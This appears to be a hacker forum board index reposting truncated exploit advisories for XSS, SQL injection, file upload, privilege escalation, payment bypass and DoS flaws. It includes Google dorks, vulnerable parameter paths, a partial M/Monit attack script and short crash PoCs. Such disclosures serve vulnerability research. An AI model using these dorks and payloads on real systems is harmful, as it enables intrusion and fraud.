CHT Vulnerability Database
Records of vulnerabilities and templates for WordPress, Windows, PHP, Linux and other systems.
15,047 topics in this board
# Exploit Title: Zuz Music 2.1 - 'zuzconsole/___contact ' Persistent Cross-site Scripting # Google Dork: N/A # Date: 14 Feb 2019 # Exploit Author: Deyaa Muhammad # Author EMail: contact [at] deyaa.me # Author Blog: http://deyaa.me # Vendor Homepage: https://zuz.host/ # Software Link: https://codecanyon.net/item/zuz-music-advance-music-platform-system/21633476 # Version: 2.1 # Tested on: WIN7_x68/Linux # CVE : N/A # Description: ---------------------- ZuzMusic 2.1 suffers from a persistent Cross-Site Scripting vulnerability. # POC: ---------------------- 1. Go To https://[PATH]/contact 2. There are three vulnerable parameters name, subject and message. 3. Inject the Jav…
Last reply by 尖REN
- 0 replies
- 91 views
################################################################################################################################## # Exploit Title: ArangoDB Community Edition 3.4.2-1 | Cross-Site Scripting # Date: 17.02.2019 # Exploit Author: Ozer Goker # Vendor Homepage: https://www.arangodb.com # Software Link: https://www.arangodb.com/download-major/ # Version: 3.4.2-1 ################################################################################################################################## Introduction ArangoDB is a native multi-model, open-source database with flexible data models for documents, graphs, and key-values. Build high performance applications usi…
Last reply by RenX6
- 0 replies
- 112 views
#!/usr/env/python3 """ Vulnerability title: M/Monit <= 3.7.2 - Privilege Escalation Author: Dolev Farhi Vulnerable version: 2.0.151021 Link: https://mmonit.com Date: 2/17/2019 """ import sys import requests MMONIT_URL = 'http://ip.add.re.ss:8080' MMONIT_USER = 'monit' # Default built in unprivileged user MMONIT_PASS = 'monit' s = requests.Session() s.get(MMONIT_URL + '/') resp = s.post(MMONIT_URL + '/z_security_check', params={'z_username':MMONIT_USER,'z_password':MMONIT_PASS}) if 'Invalid username and/or password' in resp.text: print('Error logging in') sys.exit(1) zessionid = s.cookies.get_dict()['zsessionid'] headers = { 'CSRFToken':zessioni…
Last reply by cnhackteam7
- 0 replies
- 92 views
################################################################################################################################## # Exploit Title: Comodo Dome Firewall 2.7.0 | Cross-Site Scripting # Date: 18.02.2019 # Exploit Author: Ozer Goker # Vendor Homepage: https://cdome.comodo.com/firewall/ # Software Link: https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9278&af=9278 # Version: 2.7.0 ################################################################################################################################## Introduction Comodo Dome Firewall (DFW) provides comprehensive security for enterprise networks. The firewall software…
Last reply by RenX6
# Exploit Title: Find a Place CMS Directory 1.5 - 'assets/external/data_2.php cate' SQL Injection # Google Dork: inurl:"assets/external/data.php" # Date: 14 Feb 2019 # Exploit Author: Deyaa Muhammad # Author EMail: contact [at] deyaa.me # Author Blog: http://deyaa.me # Vendor Homepage: https://themerig.com/ # Software Link: https://codecanyon.net/item/locations-multipurpose-cms-directory-theme/21098597 # Demo Website: https://themerig.com/find/ # Version: 1.5 # Tested on: WIN7_x68/Linux # CVE : N/A # Description: ---------------------- Find a Place CMS Directory 1.5 suffers from a SQL Injection vulnerability. # POC: ---------------------- 1. Access the following path ht…
Last reply by Xiao7
<?php # Exploit Title: WordPress WooCommerce - GloBee (cryptocurrency) Payment Gateway Plugin [Payment Bypass / Unauthorized Order Status Spoofing] # Discovery Date: 14.12.2018 # Public Disclosure Date: 14.02.2019 # Exploit Author: GeekHack # Contact: https://t.me/GeekHack # Vendor Homepage: https://globee.com/ (previously payb.ee) # Software Link: https://github.com/GloBee-Official/woocommerce-payment-api-plugin/releases/tag/v1.1.1 # Version: <= 1.1.1 # Tested on: WordPress 4.9.9 + WooCommerce 3.5.1 + GloBee Payment Gateway Plugin 1.1.1 # CVE: CVE-2018-20782 /* Description: Reliance on untrusted inputs (CWE-807), insufficient data verification and lack of any…
Last reply by KaiWn
A heap-based out-of-bounds read was observed in Oracle Java Runtime Environment version 8u202 (latest at the time of this writing) while fuzz-testing the processing of TrueType fonts. It manifests itself in the form of the following (or similar) crash: --- cut --- $ bin/java -cp . DisplaySfntFont test.ttf Iteration (0,0) # # A fatal error has been detected by the Java Runtime Environment: # # SIGSEGV (0xb) at pc=0x00007f42e9a30f79, pid=43119, tid=0x00007f431d7fc700 # # JRE version: Java(TM) SE Runtime Environment (8.0_202-b08) (build 1.8.0_202-b08) # Java VM: Java HotSpot(TM) 64-Bit Server VM (25.202-b08 mixed mode linux-amd64 compressed oops) # Prob…
Last reply by Anonymous
# Exploit Title: Zoho ManageEngine ServiceDesk Plus (SDP) before 10.0 build 10012 - arbitrary file upload # Date: 18-02-2019 # Exploit Author: Dao Duy Hung ([email protected]) # Vendor Homepage: https://www.manageengine.com/products/service-desk/ # Software Link: https://www.manageengine.com/products/service-desk/download.html?opDownload_indexbnr # Version: 9.4 and 10.0 before 10.0 build 10012 # Tested on: SDP 10.0 build 10000 # CVE : CVE-2019-8394 Detail: In file common/FileAttachment.jsp line 332 only check file upload extension when parameter 'module' equal to 'SSP' or 'DashBoard' or 'HomePage', and if parameter 'module' is set to 'CustomLogin' will skip check fil…
Last reply by CHQ1d
- 0 replies
- 85 views
################################################################################################################################## # Exploit Title: Apache CouchDB 2.3.0 | Cross-Site Scripting # Date: 17.02.2019 # Exploit Author: Ozer Goker # Vendor Homepage: http://couchdb.apache.org # Software Link: http://couchdb.apache.org/#download # Version: 2.3.0 ################################################################################################################################## Introduction A CouchDB server hosts named databases, which store documents. Each document is uniquely named in the database, and CouchDB provides a RESTful HTTP API for reading and updating (a…
Last reply by HACK7YD
=========================================================================================== # Exploit Title: Webiness Inventory 2.3 - 'ProductModel' Arbitrary File Upload # Dork: N/A # Date: 10-02-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://sourceforge.net/projects/webinessinventory/files/ # Software Link: https://sourceforge.net/projects/webinessinventory/files/ # Version: 2.3 # Category: Webapps # Tested on: Wamp64, Windows # CVE: CVE-2019-8404 # Software Description: Small stock inventory managment application for web. =========================================================================================== # POC: # Sign in to admin panel. then …
Last reply by cnhackteam7
A heap-based out-of-bounds read was observed in Oracle Java Runtime Environment version 8u202 (latest at the time of this writing) while fuzz-testing the processing of TrueType fonts. It manifests itself in the form of the following (or similar) crash: --- cut --- Iteration (0,0) Iteration (0,1) # # A fatal error has been detected by the Java Runtime Environment: # # SIGSEGV (0xb) at pc=0x00007f857116fde3, pid=31542, tid=0x00007f85a5a70700 # # JRE version: Java(TM) SE Runtime Environment (8.0_202-b08) (build 1.8.0_202-b08) # Java VM: Java HotSpot(TM) 64-Bit Server VM (25.202-b08 mixed mode linux-amd64 compressed oops) # Problematic frame: # C [lib…
Last reply by XenoG
- 0 replies
- 83 views
# Exploit Title: Listing Hub CMS 1.0 - 'pages.php id' SQL Injection # Google Dork: inurl:"pages.php?title=privacy-policy" # Date: 14 Feb 2019 # Exploit Author: Deyaa Muhammad # Author EMail: contact [at] deyaa.me # Author Blog: http://deyaa.me # Vendor Homepage: https://themerig.com/ # Software Link: https://codecanyon.net/item/listing-hub-cms-directory-listings-theme/21361294 # Demo Website: https://listing-hub.themerig.com # Version: 1.0 # Tested on: WIN7_x68/Linux # CVE : N/A # Description: ---------------------- Listing Hub CMS 1.0 suffers from a SQL Injection vulnerability. # POC: ---------------------- 1. Access the following path https://[PATH]/pages.php?title=pr…
Last reply by Xiao7
- 0 replies
- 90 views
# Exploit Title: Admin auth bypass, SQLi and File Disclosure # Google Dork: no defacers please ! # Date: March 2019 (reported to vendor without response :D) # Exploit Author: Efren Diaz # Author contact: https://twitter.com/elefr3n # Vendor Homepage: https://www.edirectory.com/ # Software Link: not available # Version: All versions # Tested on: Ubuntu 14.04 # CVE : none #DESCRIPTION eDirectory is a software to create your own membership website, business directories, yellow pages, coupon sites, local guide, lead gen sites and more. # SQL Injection Links: - https://site.com/location.php?type=byId&id=[INT]&childLevel=[INT]&level=[SQLi] - https://site.com/…
Last reply by Tenfk
- 0 replies
- 87 views
#Exploit Title: NetSetMan 4.7.1 'Workgroup' - Denial of Service (PoC) #Discovery by: Victor Mondragón #Discovery Date: 2018-02-17 #Vendor Homepage: https://www.netsetman.com/ #Software Link: https://www.netsetman.com/netsetman.exe #Tested Version: 4.7.1 #Tested on: Windows 10 Single Language x64 / Windows 7 x32 Service Pack 1 #Steps to produce the crash: #1.- Run python code: NetSetMan_4.7.1.py #2.- Open netsetman.txt and copy content to clipboard #3.- Open NetSetMan #4.- Enable "Workgroup" and Paste Clipboard #5.- Click on "Activate" #6.- Crashed cod = "\x41" * 100 f = open('netsetman.txt', 'w') f.write(cod) f.close()
Last reply by 剑道尘心
- 0 replies
- 86 views
#Exploit Title: Valentina Studio 9.0.4 - Denial of Service (PoC) #Discovery by: Victor Mondragón #Discovery Date: 2018-02-19 #Vendor Homepage: https://valentina-db.com/en/ #Software Link: https://valentina-db.com/en/developer/database/download-valentina-database-adk #Tested Version: 9.0.4 #Tested on: Windows 7 x64 Service Pack 1 #Steps to produce the crash: #1.- Run python code: Valentina_Studio_9.0.4.py #2.- Open valentina.txt and copy content to clipboard #3.- Open Valentina Studio #4.- Select "File" > "Connect to" #5.- Select "Valentina Server" #6.- Select "Host" and Paste Clipboard #7.- Crashed cod = "\x41" * 256 f = open('valentina.txt', 'w') f.write(cod) f.clo…
Last reply by 尖REN
A heap-based out-of-bounds read was observed in Oracle Java Runtime Environment version 8u202 (latest at the time of this writing) while fuzz-testing the processing of TrueType fonts. It manifests itself in the form of the following (or similar) crash: --- cut --- $ bin/java -cp . DisplaySfntFont test.ttf Iteration (0,0) Iteration (0,1) Iteration (0,2) Iteration (0,3) Iteration (0,4) # # A fatal error has been detected by the Java Runtime Environment: # # SIGSEGV (0xb) at pc=0x00007fbaa11694c8, pid=19540, tid=0x00007fbac4f18700 # # JRE version: Java(TM) SE Runtime Environment (8.0_202-b08) (build 1.8.0_202-b08) # Java VM: Java HotSpot(TM) 64-Bi…
Last reply by 风尘剑心
# Exploit Title: MaxxAudio Drivers WavesSysSvc64.exe File Permissions SYSTEM Privilege Escalation # Google Dork: # Date: 2/18/2019 # Exploit Author: Mike Siegel @ml_siegel # Vendor Homepage: https://maxx.com # Software Link: # Version: 1.6.2.0 (May affect other versions) # Tested on: Win 10 64 bit # CVE : CVE-2019-15084 MaxxAudio licenses their driver technology to OEMs and is commonly installed on Dell Laptops (and others) as part of other driver installations. MaxxAudio drivers version 1.6.2.0 install with incorrect file permissions. As a result a local attacker can escalate to SYSTEM level privileges. Dell PSIRT has acknowledged the issue and advises updating to …
Last reply by KaiWn
A heap-based out-of-bounds read was observed in Oracle Java Runtime Environment version 8u202 (latest at the time of this writing) while fuzz-testing the processing of OpenType fonts. It manifests itself in the form of the following crash (with AFL's libdislocator): --- cut --- gdb$ c Continuing. Iteration (0,0) Thread 2 "java" received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] RAX: 0x6d1a RBX: 0x7fffb5d94f48 --> 0x7fffb6319f00 --> 0x53ab1500ff RCX: 0xffffffffffff0000 RDX: 0x7fff28fbdfe6 --> 0x2a001d00100003 RSI: 0x7fff28fadfe8 --> 0x1e001100040000 [...] [-------…
Last reply by 轩辕三官